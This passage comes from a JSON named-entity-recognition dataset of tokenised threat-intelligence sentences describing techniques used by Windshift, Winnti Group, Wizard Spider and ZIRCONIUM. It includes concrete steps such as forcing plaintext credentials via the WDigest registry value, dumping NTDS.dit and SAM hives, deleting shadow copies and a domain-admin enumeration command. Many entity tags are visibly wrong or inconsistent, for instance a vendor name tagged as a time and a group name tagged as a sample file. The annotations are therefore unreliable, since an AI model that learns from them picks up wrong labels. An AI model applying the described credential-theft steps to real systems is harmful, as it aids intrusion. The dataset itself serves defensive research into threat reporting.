"malware", "to", "identify", "the", "username", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Windshift", "has", "used", "Visual", "Basic", "6", "(VB6)", "payloads." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O" ] }, { "tokens": [ "Windshift", "has", "used", "tools", "that", "communicate", "with", "C2", "over", "HTTP." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Windshift", "has", "used", "WMI", "to", "collect", "information", "about", "target", "machines." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Winnti", "Group", "used", "stolen", "certificates", "to", "sign", "its", "malware." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Winnti", "Group", "has", "registered", "domains", "for", "C2", "that", "mimicked", "sites", "of", "their", "intended", "targets." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Winnti", "Group", "has", "used", "a", "program", "named", "ff.exe", "to", "search", "for", "specific", "documents", "on", "compromised", "hosts." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "Winnti", "Group", "has", "downloaded", "an", "auxiliary", "program", "named", "ff.exe", "to", "infected", "machines." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "Winnti", "Group", "looked", "for", "a", "specific", "process", "running", "on", "infected", "servers." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Winnti", "Group", "used", "a", "rootkit", "to", "modify", "typical", "server", "functionality." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Wizard", "Spider", "has", "archived", "data", "into", "ZIP", "files", "on", "compromised", "machines." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Wizard", "Spider", "has", "used", "batch", "scripts", "that", "utilizes", "WMIC", "to", "execute", "a", "BITSAdmin", "transfer", "of", "a", "ransomware", "payload", "to", "each", "compromised", "machine." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Wizard", "Spider", "has", "used", "Digicert", "code-signing", "certificates", "for", "some", "of", "its", "malware." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Wizard", "Spider", "has", "obtained", "code", "signing", "certificates", "signed", "by", "DigiCert,", "GlobalSign,", "and", "COMOOD", "for", "malware", "payloads." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "B-Time", "B-Way", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Wizard", "Spider", "used", "Base64", "encoding", "to", "obfuscate", "an", "Empire", "service", "and", "PowerShell", "commands." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Wizard", "Spider", "has", "collected", "and", "staged", "credentials", "and", "network", "enumeration", "information,", "using", "the", "networkdll", "and", "psfin", "TrickBot", "modules." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "B-Way", "O", "B-Way", "B-Way", "O" ] }, { "tokens": [ "Wizard", "Spider", "has", "collected", "data", "from", "a", "compromised", "host", "prior", "to", "exfiltration." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Wizard", "Spider", "has", "shut", "down", "or", "uninstalled", "security", "applications", "on", "victim", "systems", "that", "might", "prevent", "ransomware", "from", "executing." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Org", "O", "O" ] }, { "tokens": [ "Wizard", "Spider", "has", "identified", "domain", "admins", "through", "the", "use", "of", "`net", "group", "\"Domain", "admins\"", "/DOMAIN`.", "Wizard", "Spider", "has", "also", "leveraged", "the", "PowerShell", "cmdlet", "`Get-ADComputer`", "to", "collect", "account", "names", "from", "Active", "Directory", "data." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-HackOrg", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Wizard", "Spider", "has", "created", "and", "used", "new", "accounts", "within", "a", "victim's", "Active", "Directory", "environment", "to", "maintain", "persistence." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Wizard", "Spider", "has", "used", "administrative", "accounts,", "including", "Domain", "Admin,", "to", "move", "laterally", "within", "a", "victim", "network." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Wizard", "Spider", "has", "injected", "malicious", "DLLs", "into", "memory", "with", "read,", "write,", "and", "execute", "permissions." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "I-Way", "O", "B-Way", "O", "O", "O", "O", "B-Features", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "Wizard", "Spider", "has", "leveraged", "ProtonMail", "email", "addresses", "in", "ransom", "notes", "when", "delivering", "Ryuk", "ransomware." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Wizard", "Spider", "has", "exfiltrated", "domain", "credentials", "and", "network", "enumeration", "information", "over", "command", "and", "control", "(C2)", "channels." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Wizard", "Spider", "has", "exfiltrated", "victim", "information", "using", "FTP." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Wizard", "Spider", "has", "exfiltrated", "stolen", "victim", "data", "to", "various", "cloud", "storage", "providers." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "I-Org", "I-Org", "O" ] }, { "tokens": [ "Wizard", "Spider", "has", "exploited", "or", "attempted", "to", "exploit", "Zerologon", "(CVE-2020-1472)", "and", "EternalBlue", "(MS17-010)", "vulnerabilities." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "B-Way", "B-Features", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Wizard", "Spider", "has", "accessed", "victim", "networks", "by", "using", "stolen", "credentials", "to", "access", "the", "corporate", "VPN", "infrastructure." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "I-Way", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Wizard", "Spider", "has", "used", "file", "deletion", "to", "remove", "some", "modules", "and", "configurations", "from", "an", "infected", "host", "after", "use." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Wizard", "Spider", "has", "used", "PowerShell", "cmdlets", "`Get-GPPPassword`", "and", "`Find-GPOPassword`", "to", "find", "unsecured", "credentials", "in", "a", "compromised", "network", "group", "policy." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-SamFile", "B-SamFile", "B-Way", "O", "B-Way", "O", "B-Purp", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Wizard", "Spider", "can", "transfer", "malicious", "payloads", "such", "as", "ransomware", "to", "compromised", "machines." ], "ner_tags": [ "B-SamFile", "B-HackOrg", "O", "B-Purp", "B-Features", "I-Purp", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Wizard", "Spider", "has", "used", "WMIC", "and", "vssadmin", "to", "manually", "delete", "volume", "shadow", "copies.", "Wizard", "Spider", "has", "also", "used", "Conti", "ransomware", "to", "delete", "volume", "shadow", "copies", "automatically", "with", "the", "use", "of", "vssadmin." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Wizard", "Spider", "has", "used", "Rubeus,", "MimiKatz", "Kerberos", "module,", "and", "the", "Invoke-Kerberoast", "cmdlet", "to", "steal", "AES", "hashes." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "B-Way", "I-Tool", "O", "O", "O", "B-Way", "B-Way", "O", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "Wizard", "Spider", "has", "used", "the", "Invoke-Inveigh", "PowerShell", "cmdlets,", "likely", "for", "name", "service", "poisoning." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "B-Way", "B-Tool", "B-SamFile", "O", "O", "I-Way", "I-Way", "O" ] }, { "tokens": [ "Wizard", "Spider", "has", "dumped", "the", "lsass.exe", "memory", "to", "harvest", "credentials", "with", "the", "use", "of", "open-source", "tool", "LaZagne." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Wizard", "Spider", "has", "used", "stolen", "credentials", "to", "copy", "tools", "into", "the", "<code>%TEMP%</code>", "directory", "of", "domain", "controllers." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "I-OffAct", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Wizard", "Spider", "has", "created", "local", "administrator", "accounts", "to", "maintain", "persistence", "in", "compromised", "networks." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "B-Purp", "O", "O", "I-Purp", "I-Purp", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "Wizard", "Spider", "has", "staged", "ZIP", "files", "in", "local", "directories", "such", "as,", "`C:\\PerfLogs\\1\\`", "and", "`C:\\User\\1\\`", "prior", "to", "exfiltration." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Wizard", "Spider", "has", "lured", "victims", "to", "execute", "malware", "with", "spearphishing", "attachments", "containing", "macros", "to", "download", "either", "Emotet,", "Bokbot,", "TrickBot,", "or", "Bazar." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Wizard", "Spider", "has", "lured", "victims", "into", "clicking", "a", "malicious", "link", "delivered", "through", "spearphishing." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Wizard", "Spider", "has", "used", "scheduled", "tasks", "to", "install", "TrickBot,", "using", "task", "names", "to", "appear", "legitimate", "such", "as", "WinDotNet,", "GoogleTask,", "or", "Sysnetsf.", "It", "has", "also", "used", "common", "document", "file", "names", "for", "other", "malware", "binaries." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Wizard", "Spider", "has", "modified", "the", "Registry", "key", "<code>HKLM\\System\\CurrentControlSet\\Control\\SecurityProviders\\WDigest</code>", "by", "setting", "the", "<code>UseLogonCredential</code>", "registry", "value", "to", "<code>1</code>", "in", "order", "to", "force", "credentials", "to", "be", "stored", "in", "clear", "text", "in", "memory.", "Wizard", "Spider", "has", "also", "modified", "the", "WDigest", "registry", "key", "to", "allow", "plaintext", "credentials", "to", "be", "cached", "in", "memory." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Wizard", "Spider", "has", "gained", "access", "to", "credentials", "via", "exported", "copies", "of", "the", "ntds.dit", "Active", "Directory", "database.", "Wizard", "Spider", "has", "also", "created", "a", "volume", "shadow", "copy", "and", "used", "a", "batch", "script", "file", "to", "collect", "NTDS.dit", "with", "the", "use", "of", "the", "Windows", "utility,", "ntdsutil." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Way", "I-Way", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Wizard", "Spider", "has", "used", "the", "“net", "view”", "command", "to", "locate", "mapped", "network", "shares." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Wizard", "Spider", "has", "used", "the", "`Invoke-SMBExec`", "PowerShell", "cmdlet", "to", "execute", "the", "pass-the-hash", "technique", "and", "utilized", "stolen", "password", "hashes", "to", "move", "laterally." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "B-Way", "B-Way", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Wizard", "Spider", "has", "used", "macros", "to", "execute", "PowerShell", "scripts", "to", "download", "malware", "on", "victim's", "machines.", "It", "has", "also", "used", "PowerShell", "to", "execute", "commands", "and", "move", "laterally", "through", "a", "victim", "network." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Wizard", "Spider", "has", "used", "process", "injection", "to", "execute", "payloads", "to", "escalate", "privileges." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Wizard", "Spider", "has", "established", "persistence", "via", "the", "Registry", "key", "<code>HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run</code>", "and", "a", "shortcut", "within", "the", "startup", "folder." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Wizard", "Spider", "has", "used", "RDP", "for", "lateral", "movement", "and", "to", "deploy", "ransomware", "interactively." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-Org", "O" ] }, { "tokens": [ "Wizard", "Spider", "has", "used", "the", "WebDAV", "protocol", "to", "execute", "Ryuk", "payloads", "hosted", "on", "network", "file", "shares." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Wizard", "Spider", "has", "used", "networkdll", "for", "network", "discovery", "and", "psfin", "specifically", "for", "financial", "and", "point", "of", "sale", "indicators.", "Wizard", "Spider", "has", "also", "used", "AdFind,", "<code>nltest/dclist</code>,", "and", "PowerShell", "script", "Get-DataInfo.ps1", "to", "enumerate", "domain", "computers,", "including", "the", "domain", "controller." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "B-Way", "B-SamFile", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Wizard", "Spider", "has", "utilized", "`rundll32.exe`", "to", "deploy", "ransomware", "commands", "with", "the", "use", "of", "WebDAV." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-SamFile", "O", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Wizard", "Spider", "has", "used", "SMB", "to", "drop", "Cobalt", "Strike", "Beacon", "on", "a", "domain", "controller", "for", "lateral", "movement." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Wizard", "Spider", "has", "used", "scheduled", "tasks", "to", "establish", "persistence", "for", "TrickBot", "and", "other", "malware." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Wizard", "Spider", "has", "acquired", "credentials", "from", "the", "SAM/SECURITY", "registry", "hives." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Wizard", "Spider", "has", "used", "WMI", "to", "identify", "anti-virus", "products", "installed", "on", "a", "victim's", "machine." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Wizard", "Spider", "has", "used", "`services.exe`", "to", "execute", "scripts", "and", "executables", "during", "lateral", "movement", "within", "a", "victim's", "network.", "Wizard", "Spider", "has", "also", "used", "batch", "scripts", "that", "leverage", "PsExec", "to", "execute", "a", "previously", "transferred", "ransomware", "payload", "on", "a", "victim's", "network." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Wizard", "Spider", "has", "used", "taskkill.exe", "and", "net.exe", "to", "stop", "backup,", "catalog,", "cloud,", "and", "other", "services", "prior", "to", "network", "encryption." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Wizard", "Spider", "has", "utilized", "the", "PowerShell", "script", "`Get-DataInfo.ps1`", "to", "collect", "installed", "backup", "software", "information", "from", "a", "compromised", "machine." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "B-Way", "B-Tool", "B-Way", "O", "B-Purp", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Wizard", "Spider", "has", "used", "spearphishing", "attachments", "to", "deliver", "Microsoft", "documents", "containing", "macros", "or", "PDFs", "containing", "malicious", "links", "to", "download", "either", "Emotet,", "Bokbot,", "TrickBot,", "or", "Bazar." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Wizard", "Spider", "has", "sent", "phishing", "emails", "containing", "a", "link", "to", "an", "actor-controlled", "Google", "Drive", "document", "or", "other", "free", "online", "file", "hosting", "services." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "I-Way", "I-Features", "I-Features", "I-Features", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Wizard", "Spider", "has", "used", "Systeminfo", "and", "similar", "commands", "to", "acquire", "detailed", "configuration", "information", "of", "a", "victim's", "machine.", "Wizard", "Spider", "has", "also", "utilized", "the", "PowerShell", "cmdlet", "`Get-ADComputer`", "to", "collect", "DNS", "hostnames,", "last", "logon", "dates,", "and", "operating", "system", "information", "from", "Active", "Directory." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Wizard", "Spider", "has", "used", "ipconfig", "to", "identify", "the", "network", "configuration", "of", "a", "victim", "machine.", "Wizard", "Spider", "has", "also", "used", "the", "PowerShell", "cmdlet", "`Get-ADComputer`", "to", "collect", "IP", "address", "data", "from", "Active", "Directory." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Wizard", "Spider", "has", "used", "\"whoami\"", "to", "identify", "the", "local", "user", "and", "their", "privileges." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Wizard", "Spider", "has", "utilized", "tools", "such", "as", "Empire,", "Cobalt", "Strike,", "Cobalt", "Strike,", "Rubeus,", "AdFind,", "BloodHound,", "Metasploit,", "Advanced", "IP", "Scanner,", "Nirsoft", "PingInfoView,", "and", "SoftPerfect", "Network", "Scanner", "for", "targeting", "efforts." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "B-Tool", "B-Way", "B-Tool", "B-Way", "B-Tool", "B-Way", "B-Way", "B-Way", "B-Way", "I-Tool", "I-Tool", "O", "B-Way", "B-Tool", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "Wizard", "Spider", "has", "used", "valid", "credentials", "for", "privileged", "accounts", "with", "the", "goal", "of", "accessing", "domain", "controllers." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "I-Way", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-Purp" ] }, { "tokens": [ "Wizard", "Spider", "has", "used", "HTTP", "for", "network", "communications." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "I-Idus", "O" ] }, { "tokens": [ "Wizard", "Spider", "has", "used", "`cmd.exe`", "to", "execute", "commands", "on", "a", "victim's", "machine." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Wizard", "Spider", "has", "used", "PowerShell", "cmdlet", "`Invoke-WCMDump`", "to", "enumerate", "Windows", "credentials", "in", "the", "Credential", "Manager", "in", "a", "compromised", "network." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-SamFile", "B-SamFile", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Wizard", "Spider", "has", "used", "the", "icacls", "command", "to", "modify", "access", "control", "to", "backup", "servers,", "providing", "them", "with", "full", "control", "of", "all", "the", "system", "folders." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Wizard", "Spider", "has", "used", "WMI", "and", "LDAP", "queries", "for", "network", "discovery", "and", "to", "move", "laterally.", "Wizard", "Spider", "has", "also", "used", "batch", "scripts", "to", "leverage", "WMIC", "to", "deploy", "ransomware." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "B-Tool", "B-Way", "O", "O", "B-Way", "O", "B-OffAct", "B-Org" ] }, { "tokens": [ "Wizard", "Spider", "has", "used", "Window", "Remote", "Management", "to", "move", "laterally", "through", "a", "victim", "network." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Wizard", "Spider", "has", "installed", "TrickBot", "as", "a", "service", "named", "ControlServiceA", "in", "order", "to", "establish", "persistence." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Wizard", "Spider", "has", "established", "persistence", "using", "Userinit", "by", "adding", "the", "Registry", "key", "HKLM\\SOFTWARE\\Microsoft\\Windows", "NT\\CurrentVersion\\Winlogon." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "ZIRCONIUM", "has", "used", "Dropbox", "for", "C2", "allowing", "upload", "and", "download", "of", "files", "as", "well", "as", "execution", "of", "arbitrary", "commands." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "B-Features", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ZIRCONIUM", "has", "used", "a", "tool", "to", "steal", "credentials", "from", "installed", "web", "browsers", "including", "Microsoft", "Internet", "Explorer", "and", "Google", "Chrome." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "I-Tool", "O" ] }, { "tokens": [ "ZIRCONIUM", "has", "used", "the", "AES256", "algorithm", "with", "a", "SHA1", "derived", "key", "to", "decrypt", "exploit", "code." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ZIRCONIUM", "has", "purchased", "domains", "for", "use", "in", "targeted", "campaigns." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-OffAct" ] }, { "tokens": [ "ZIRCONIUM", "has", "exfiltrated", "files", "via", "the", "Dropbox", "API", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "O" ] }, { "tokens": [ "ZIRCONIUM", "has", "exfiltrated", "stolen", "data", "to", "Dropbox." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "ZIRCONIUM", "has", "exploited", "CVE-2017-0005", "for", "local", "privilege", "escalation." ], "ner_tags": [ "B-Idus", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "ZIRCONIUM", "has", "used", "tools", "to", "download", "malicious", "files", "to", "compromised", "hosts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ZIRCONIUM", "has", "used", "malicious", "links", "in", "e-mails", "to", "lure", "victims", "into", "downloading", "malware." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "ZIRCONIUM", "has", "created", "a", "run", "key", "named", "<code>Dropbox", "Update", "Setup</code>", "to", "mask", "a", "persistence", "mechanism", "for", "a", "malicious", "binary." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ZIRCONIUM", "has", "spoofed", "legitimate", "applications", "in", "phishing", "lures", "and", "changed", "file", "extensions", "to", "conceal", "installation", "of", "malware." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ZIRCONIUM", "has", "used", "the", "msiexec.exe", "command-line", "utility", "to", "download", "and", "execute", "malicious", "MSI", "files." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ZIRCONIUM", "targeted", "presidential", "campaign", "staffers", "with", "credential", "phishing", "e-mails." ], "ner_tags": [ "B-Idus", "O", "I-Org", "I-Org", "B-Purp", "O", "O", 